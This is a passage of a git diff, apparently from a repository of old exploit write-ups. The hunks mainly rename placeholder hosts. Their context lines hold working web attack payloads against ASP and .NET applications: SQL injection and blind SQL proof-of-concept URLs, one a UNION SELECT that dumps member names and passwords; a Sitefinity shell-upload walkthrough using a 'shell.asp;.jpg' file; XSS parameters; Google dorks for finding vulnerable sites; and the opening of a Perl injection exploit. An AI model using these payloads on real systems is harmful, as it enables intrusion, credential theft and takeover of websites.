~~~~~~~~~~~~~~~~[Vulnerabilities]~~~~~~~~~~~~~~~~~~~~~~~~~~~~

View file

@ -25,7 +25,7 @@ NewsPad Database Download Vulnerability
############################################################
exploit # www.target.com/path/database/NewsPad.mdb
exploit # server/path/database/NewsPad.mdb
############################################################

View file

@ -1,4 +1,4 @@
) ) ) ( ( ( ( ( ) )
) ) ) ( ( ( ( ( ) )
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\

View file

@ -1,4 +1,4 @@
) ) ) ( ( ( ( ( ) )
) ) ) ( ( ( ( ( ) )
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\

View file

@ -1,4 +1,4 @@
) ) ) ( ( ( ( ( ) )
) ) ) ( ( ( ( ( ) )
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\

View file

@ -1,4 +1,4 @@
) ) ) ( ( ( ( ( ) )
) ) ) ( ( ( ( ( ) )
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\

View file

@ -17,13 +17,13 @@ Sitefinity CMS (ASP.NET) Shell Upload Vulnerability
exploit # /UserControls/Dialogs/ImageEditorDialog.aspx
first go to # http://site.com/sitefinity/
first go to # http://server/sitefinity/
then # http://site.com/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
then # http://server/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
select # asp renamed via the .asp;.jpg (shell.asp;.jpg)
Upload to # http://site.com/Images/[shell]
Upload to # http://server/Images/[shell]
Video : http://net-edit0r.persiangig.com/Film/0day.rar

View file

@ -46,4 +46,4 @@ Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , Skitt3r , M4hd1
BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic ~ keracker
###########################################################################
###########################################################################

View file

@ -1,4 +1,4 @@
Core Security Technologies - CoreLabs Advisory
Core Security Technologies - CoreLabs Advisory
http://corelabs.coresecurity.com/
Multiple vulnerabilities in BugTracker.Net

View file

@ -24,4 +24,4 @@ Code: ASP 2.0 & VBScript
SQL Injection:
http://server/ECO.asp?ECO_ID=[Code]
########################################################################################
########################################################################################

View file

@ -24,4 +24,4 @@ Sell e-books, e-zines, Flash, digital arts, ringtones... Code: ASP 2.0 & VBScrip
SQL Injection:
http://server/shoppingcart.asp?d=[Code]
########################################################################################
########################################################################################

View file

@ -1,4 +1,4 @@
#!/usr/bin/perl -w
#!/usr/bin/perl -w
# D2KBLOG SQL injection
# Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ]
# Exploited by : devil_box [ devil_box [at} kapda.ir ]
@ -15,7 +15,7 @@ print "\r\n=-=-=-===============================================================
if (@ARGV != 2)
{
print " Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n";
print " ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n";
print " ex: kapda_D2KBLOG_xpl.pl server /blog/profile.asp\n\r\n";
exit ();
}

View file

@ -36,4 +36,3 @@ Personal
# Special Thanks : Farzad_Ho,R3dMind,rAbiN_hoOd,Falcon

View file

@ -8,7 +8,7 @@
# Found: Br0ly
# google dork: inurl:"produtos.asp?produto="
# Use some base64 decode google IT.
# After decoding login and pass go to: www.site.com.br/administrador.asp
# After decoding login and pass go to: www.server.br/administrador.asp
# aoiuaoaaaaiuahiuahaaiauhaiuha EASY ???
# BRASIL!! :D
#

View file

@ -10,4 +10,4 @@ Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/resulttype.asp?probe=[Code]
http://www.example.com/resulttype.asp?probe=[Code]

View file

@ -6,11 +6,11 @@ dork : intext:"powered by DiyWeb"
SQL - Microsoft JET Database Engine error
-----------------------------------------
http://site.com/template.asp?menuid=[SQL]
http://site.com/viewcatalog.asp?id=[SQL]
http://site.com/xxx.asp?id=[SQL]
http://server/template.asp?menuid=[SQL]
http://server/viewcatalog.asp?id=[SQL]
http://server/xxx.asp?id=[SQL]
XSS
---
http://site.com/diyweb/login.asp?msg=[XSS] -- login page
http://server/diyweb/login.asp?msg=[XSS] -- login page

View file

@ -8,21 +8,21 @@ Blind SQL
POC
---
http://site.com//gallery_details.asp?a_id=12' and '1'='1 TRUE
http://site.com//gallery_details.asp?a_id=12' and '0'='1 FALSE
http://server//gallery_details.asp?a_id=12' and '1'='1 TRUE
http://server//gallery_details.asp?a_id=12' and '0'='1 FALSE
2 - Parameter news.asp?intSeq=[Blind SQL]
POC
---
http://www.site.com/news/news.asp?intSeq=69' and '1'='1 TRUE
http://www.site.com/news/news.asp?intSeq=69' and '0'='1 FALSE
http://www.server/news/news.asp?intSeq=69' and '1'='1 TRUE
http://www.server/news/news.asp?intSeq=69' and '0'='1 FALSE
3 - Parameter news.asp?id=[Blind SQL]
POC
---
http://www.site.com/news/news.asp?id=256 and 1=1 TRUE
http://www.site.com/news/news.asp?id=256 and 1=0 FALSE
http://www.server/news/news.asp?id=256 and 1=1 TRUE
http://www.server/news/news.asp?id=256 and 1=0 FALSE

View file

@ -8,13 +8,13 @@ SQL - Microsoft JET Database Engine error
------------------------------------------
view_article.asp?item=[SQL]
http://site.com/page.asp?pID=[SQL]
http://site.com/display.asp?sortby=sections&sID=[SQL]
http://server/page.asp?pID=[SQL]
http://server/display.asp?sortby=sections&sID=[SQL]
POC
---
http://site.com/view_article.asp?item=1 union select 1 from test.a
http://server/view_article.asp?item=1 union select 1 from test.a
thanks,
-p0pc0rn-

View file

@ -5,10 +5,10 @@ Found by: p0pc0rn
SQL
---
http://site.com/page.asp?id=[SQL]
http://site.com/cat.asp?catid=[SQL]
http://site.com/catin.asp?productid=[SQL]
http://server/page.asp?id=[SQL]
http://server/cat.asp?catid=[SQL]
http://server/catin.asp?productid=[SQL]
POC
---
http://site.com/page.asp?id=23 union select 1 from test.a
http://server/page.asp?id=23 union select 1 from test.a

View file

@ -6,7 +6,7 @@
# Software: Element-IT PowUpload 1.3
# Software Link: http://www.element-it.com/downloadfile.aspx?type=pow
# Demo:
http://site.com/Examples/PowUpload/Simpleupload.htm
http://server/Examples/PowUpload/Simpleupload.htm
 
[Comment]
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,

View file

@ -5,7 +5,7 @@
# Author Web: www.delincuentedigital.com.ar
# Software: EAFlashUpload v 2.5
# Software Link: http://www.easyalgo.com/downloads.aspx#EAFlashUpload
# Demo: http://www.site.com/examples/eaflashupload/simpleupload.aspx
# Demo: http://www.server/examples/eaflashupload/simpleupload.aspx
 
[Comment]
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,

View file

@ -28,10 +28,10 @@
#
#
#
# [+]http://site.com/default.asp?pid=524'
# [+]http://site.com/default.asp?pid=[SQLi]
# [+]http://site.com/viewproduct.asp?PID=130'
# [+]http://site.com/viewproduct.asp?PID=[SQli]
# [+]http://server/default.asp?pid=524'
# [+]http://server/default.asp?pid=[SQLi]
# [+]http://server/viewproduct.asp?PID=130'
# [+]http://server/viewproduct.asp?PID=[SQli]
#
#
# => PROUD TO BE AN INDIAN | Anythning for INDIA | JAI-HIND | Maa Tujhe Salam

View file

@ -6,7 +6,7 @@
First you must be logged in
Then type this in your browser
http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1
http://www.server/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1
You will find admin's password

View file

@ -12,7 +12,7 @@ Exploit Details :
2- Browse This Link : /forum/pm_show_message.asp?ID= "it's a message on Your Inbox"
3- Poc: www.site.com//forum/pm_show_message.asp?ID=(inject here)
3- Poc: www.server//forum/pm_show_message.asp?ID=(inject here)
----------------------------------------------------------------
****** SSMM T34M ******

Some files were not shown because too many files have changed in this diff Show more